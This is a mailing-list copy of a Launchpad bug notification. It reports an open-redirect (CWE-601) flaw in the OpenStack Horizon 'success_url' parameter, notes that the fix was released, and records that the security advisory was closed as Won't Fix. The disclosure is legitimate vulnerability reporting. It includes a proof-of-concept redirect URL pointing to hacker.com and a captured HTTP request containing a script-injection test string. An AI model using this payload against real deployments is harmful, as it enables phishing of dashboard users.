Given this bug report is over 2 years old and took a year in public just
to get into stable point releases, it doesn't seem to rise to the level
of urgency where we'd issue an OSSA. As such, I'm closing the Security
Advisory task as Won't Fix, but if there are any dissenting opinions I'm
happy to reopen and revisit that decision.
** Changed in: ossa
Status: Incomplete => Won't Fix
--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Dashboard (Horizon).
https://bugs.launchpad.net/bugs/1982676
Title:
Open redirect / phishing attack via "success_url" parameter in
OpenStack
Status in OpenStack Dashboard (Horizon):
Fix Released
Status in OpenStack Security Advisory:
Won't Fix
Bug description:
The "success_url" param is used when updating the project snapshot and
it lacks sanitizing the input URL that allows an attacker to redirect
the user to another website.
For instance, the URL below will redirect you to https://hacker.com:
https://xxx.com/project/snapshots/a54c1d97-d354-4171-9602-52fdf0949e83/update/?success_url=https://hacker.com
The attacker can send this link to the user and when they click on the
"Update" button the request and response will look like this:
[+] Request
POST
/project/snapshots/a54c1d97-d354-4171-9602-52fdf0949e83/update/?success_url=https%3A%2F%2Fhacker.coom
HTTP/1.1
Host: xxx.com
Cookie: _ga_0CPB5J3KQB=GS1.1.1656302247.2.0.1656302247.0;
_ga=GA1.1.2043123211.1656300031; login_region=default; login_domain="";
theme=default; sessionid=yl7fjfh7dhpwduodbxb4mjxng46qowgh;
csrftoken=j5WQq7woP7OJGKnbTAa6cbQ8zyEgUhWjIZRu4vDMNgbFbNIl5bAe7V2PESYSbUYI;
recent_project=dfcf9f80229f400a9e7ac53782be9e39
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101
Firefox/91.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
<====================>SNIP<====================>
csrfmiddlewaretoken=9wp8nOC21UvAGFxqG0qa1DjRsdKg26P0yqkM1cJqZ3SwbISASBQiWnvyxx4SjJRp&name=snapshot+for+%3Cscript%3Ealert%281%29%3C%2Fscript%3E+%22+%27%5Cu0022%C3%A2%5Cx04&description=
[+] Response
HTTP/1.1 302 Found
date: Tue, 12 Jul 2022 10:14:38 GMT
server: Apache/2.4.41 (Ubuntu)
location: https://hacker.com
content-length: 0
x-horizon-location: https://hacker.com
x-frame-options: SAMEORIGIN
vary: Accept-Language,Cookie
content-language: en
<====================>SNIP<====================>
Impact: The attacker can trick redirect users to the cloned website to
steal information, a so-called Phishing Attack.
CWE-601: URL Redirection to Untrusted Site ('Open Redirect')
http://cwe.mitre.org/data/definitions/601.html
I have tested it on OpenStack Xena so the Horizon dashboard could be between
version 20.0.0 to 20.1.2. I haven't tested the bug on other versions.
Unfortunately, I have discovered this bug when pen-testing a black box
project so I do not have the log file. Hope my information helps you to
understand the bug.
To manage notifications about this bug go to:
https://bugs.launchpad.net/horizon/+bug/1982676/+subscriptions
--
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help : https://help.launchpad.net/ListHelp
